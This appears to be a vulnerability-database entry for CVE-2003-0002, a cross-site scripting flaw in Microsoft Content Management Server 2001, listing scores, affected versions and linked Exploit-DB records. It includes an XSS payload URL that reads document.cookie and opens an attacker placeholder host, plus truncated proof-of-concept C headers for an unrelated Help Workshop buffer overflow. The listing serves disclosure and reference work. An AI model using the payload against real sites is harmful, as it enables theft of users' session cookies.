CVE-2003-0002
published 2003-02-07CVE-2003-0002: Cross-site scripting vulnerability (XSS) in ManualLogin.asp script for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute…
PriorityP428medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
23.33%
97.5th percentile
Cross-site scripting vulnerability (XSS) in ManualLogin.asp script for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary script via the REASONTXT parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | content_management_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
exploitdb·2007-01-19
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e
#define PROC_NAME_OFFSET 0x166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
unsigned int extPro;
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
exploitdb·2007-01-17
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
Exploit-DB
Microsoft Content Management Server 2001 - Cross-Site Scripting
exploitdb·2002-10-09
CVE-2003-0002 Microsoft Content Management Server 2001 - Cross-Site Scripting
Microsoft Content Management Server 2001 - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/5922/info
Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks.
An attacker could construct a malicious link to a vulnerable host that contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will be rendered in their browser, in the security context of the vulnerable site.
http://www.example.com/NR/System/Access/ManualLogin.asp?
REASONTXT= alert(document.cookie);window.open
("http://attacker.site.example.com");
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=103417794800719&w=2http://www.iss.net/security_center/static/10318.phphttp://www.securityfocus.com/bid/5922https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-002http://marc.info/?l=bugtraq&m=103417794800719&w=2http://www.iss.net/security_center/static/10318.phphttp://www.securityfocus.com/bid/5922https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-002
2003-02-07
Published